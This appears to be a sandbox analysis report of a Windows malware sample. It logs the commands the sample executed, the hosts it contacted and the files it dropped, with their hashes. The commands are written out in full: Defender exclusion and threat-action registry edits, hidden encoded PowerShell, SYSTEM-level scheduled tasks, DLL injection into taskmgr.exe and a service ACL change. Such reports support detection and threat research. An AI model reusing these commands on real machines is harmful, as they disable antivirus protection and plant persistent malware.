"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggLAFgWrk" /SC once /ST 09:08:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggLAFgWrk"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggLAFgWrk"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 07:19:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\FdDlcag.exe\" Ty /JCsite_idmEP 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "mRaseIvrfxDtBOYKW"
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\FdDlcag.exe
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\FdDlcag.exe Ty /JCsite_idmEP 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\oBlsMT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 8.8.8.8:53 | operandotwo.com | udp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| US | 8.8.8.8:53 | shipofdestiny.com | udp |
| US | 8.8.8.8:53 | sty.ink | udp |
| US | 8.8.8.8:53 | namemail.org | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | cu82342.tw1.ru | udp |
| US | 104.21.15.5:443 | operandotwo.com | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| US | 188.114.96.2:443 | shipofdestiny.com | tcp |
| US | 188.114.96.2:443 | shipofdestiny.com | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| US | 8.8.8.8:53 | 170.34.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | guseman.org | udp |
| US | 172.67.173.167:443 | guseman.org | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| RU | 176.57.210.144:443 | cu82342.tw1.ru | tcp |
| US | 8.8.8.8:53 | 144.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.15.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.173.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.200.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 112.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lawyerbuyer.org | udp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| US | 8.8.8.8:53 | d.392391234.xyz | udp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| US | 8.8.8.8:53 | 144.210.57.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.45.164.95.in-addr.arpa | udp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 8.8.8.8:53 | 65.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | 57.76.21.104.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| DE | 185.172.128.209:80 | 185.172.128.209 | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 82.145.216.16:443 | features.opera-api2.com | tcp |
| NL | 185.26.182.122:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| GB | 95.101.143.243:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 243.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.74.101.95.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | download5.operacdn.com | udp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| US | 8.8.8.8:53 | 89.10.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ba161b56-497b-40c5-b4b7-93a79033bf69.uuid.alldatadump.org | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server16.alldatadump.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun4.l.google.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.108:443 | server16.alldatadump.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.94.21.104.in-addr.arpa | udp |
| CH | 172.217.210.127:19302 | stun4.l.google.com | udp |
| US | 8.8.8.8:53 | 127.210.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 121.150.80.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.143.101.95.in-addr.arpa | udp |
| BG | 185.82.216.108:443 | server16.alldatadump.org | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.179.238:443 | clients2.google.com | tcp |
Files
memory/2256-0-0x0000023F6B420000-0x0000023F6B42C000-memory.dmp
memory/2256-1-0x00007FFCED8A0000-0x00007FFCEE361000-memory.dmp
memory/2256-2-0x0000023F6D970000-0x0000023F6D980000-memory.dmp
memory/2256-3-0x0000023F6D890000-0x0000023F6D8EE000-memory.dmp
memory/2844-4-0x000001AD63B60000-0x000001AD63B82000-memory.dmp
memory/2844-5-0x00007FFCED8A0000-0x00007FFCEE361000-memory.dmp
memory/2844-6-0x000001AD7C100000-0x000001AD7C110000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h3dk3xc5.fmd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2844-7-0x000001AD7C100000-0x000001AD7C110000-memory.dmp
memory/2844-17-0x000001AD7C100000-0x000001AD7C110000-memory.dmp
memory/2844-18-0x000001AD7C100000-0x000001AD7C110000-memory.dmp
memory/2844-21-0x00007FFCED8A0000-0x00007FFCEE361000-memory.dmp
memory/3380-22-0x0000000000400000-0x0000000000408000-memory.dmp
memory/3380-23-0x00000000749A0000-0x0000000075150000-memory.dmp
memory/3380-24-0x0000000002B10000-0x0000000002B20000-memory.dmp
memory/2256-25-0x00007FFCED8A0000-0x00007FFCEE361000-memory.dmp
memory/2256-26-0x00007FFCED8A0000-0x00007FFCEE361000-memory.dmp
C:\Users\Admin\Pictures\BOSZZJIKQsyVPaQHRszqlvlV.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\dGRFal8qQzpgtFutf7LbHsxR.exe
| MD5 | c17df3b36319b6b84e52bdce820abf10 |
| SHA1 | eea9d0ffcf2112b098bc2cca88d2011f466298ec |
| SHA256 | 37681e9a5d6ab77924f9b43c5f717ff63cc5bece2116c05bd382089f22137157 |
| SHA512 | b08936a50a618ef03c4367b442febe400193ddfd9e033009b00e8823aad1f68d38415624f4a22144ce9cd12d68dd52ffbfd9e1e5e8c2d2c13f1e3312c9dc68df |
memory/1672-52-0x0000000000BE0000-0x0000000000CE0000-memory.dmp
memory/1672-53-0x0000000002650000-0x00000000026BE000-memory.dmp
memory/1672-54-0x0000000000400000-0x0000000000B0E000-memory.dmp
C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe
| MD5 | db2472ac77f8643d97782704e54c19dc |
| SHA1 | 0c618c3f12f5bbe4983431210f9148e58a5f965b |
| SHA256 | 9100d2cfcd9248cfc577a35519d108146f0358e81ba15432544f76b7113951b1 |
| SHA512 | dbffd3e0f20e2835735f65f665f491ac9da0ceeaff6441364d8514c75bd635ce4c99dc7d3fcf96ecbbbd7460d8bbee5e6e3bfb953ce43a8be496f1c9121c50c2 |
memory/2696-69-0x0000000002C10000-0x0000000003013000-memory.dmp
C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe
| MD5 | 808a710a267e8394e802281380ca0b59 |
| SHA1 | 151555028550b912c0bef786fe1b99e3437dde72 |
| SHA256 | 31fa6769cb32f90dfa2809349040c227bd88f3a553bc50915656f60863b86f34 |
| SHA512 | bfcdc6e2f429569b0ebf4bf8e1592ed28f85467a90554d7796c11f4e8aebc0ab409be9dd75189a25c2fa988534c1be6eb073dfec7637c6c4b58c11a7ad3b3a25 |
memory/2696-81-0x0000000003020000-0x000000000390B000-memory.dmp
memory/2696-86-0x0000000000400000-0x0000000000ED4000-memory.dmp
C:\Users\Admin\Pictures\9J0qa6e7aiaDLK5JDqoWIdOI.exe
| MD5 | 7960d8afbbac06f216cceeb1531093bb |
| SHA1 | 008221bf66a0749447cffcb86f2d1ec80e23fc76 |
| SHA256 | f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84 |
| SHA512 | 35d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147 |
memory/2772-98-0x0000000002FA0000-0x000000000388B000-memory.dmp
memory/2772-101-0x0000000002A90000-0x0000000002E94000-memory.dmp
memory/2772-100-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/4988-103-0x00000000008C0000-0x000000000092E000-memory.dmp
C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe
| MD5 | 4204b9d4c4df5c4b4d67922db24f342a |
| SHA1 | 9255b5e94028f3f55adda2576d60bd39452eaf08 |
| SHA256 | 62cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414 |
| SHA512 | 0b4ed4d6397c9f34cf2c72d9c581a6e5d94eabf395da0010073b1600883dac6fcc48c1606ffee29952bd60707caf03b8a6d6cf644b2ac668306b4a418d726423 |
memory/4988-133-0x0000000005240000-0x0000000005250000-memory.dmp
memory/4812-134-0x0000000000400000-0x000000000046D000-memory.dmp
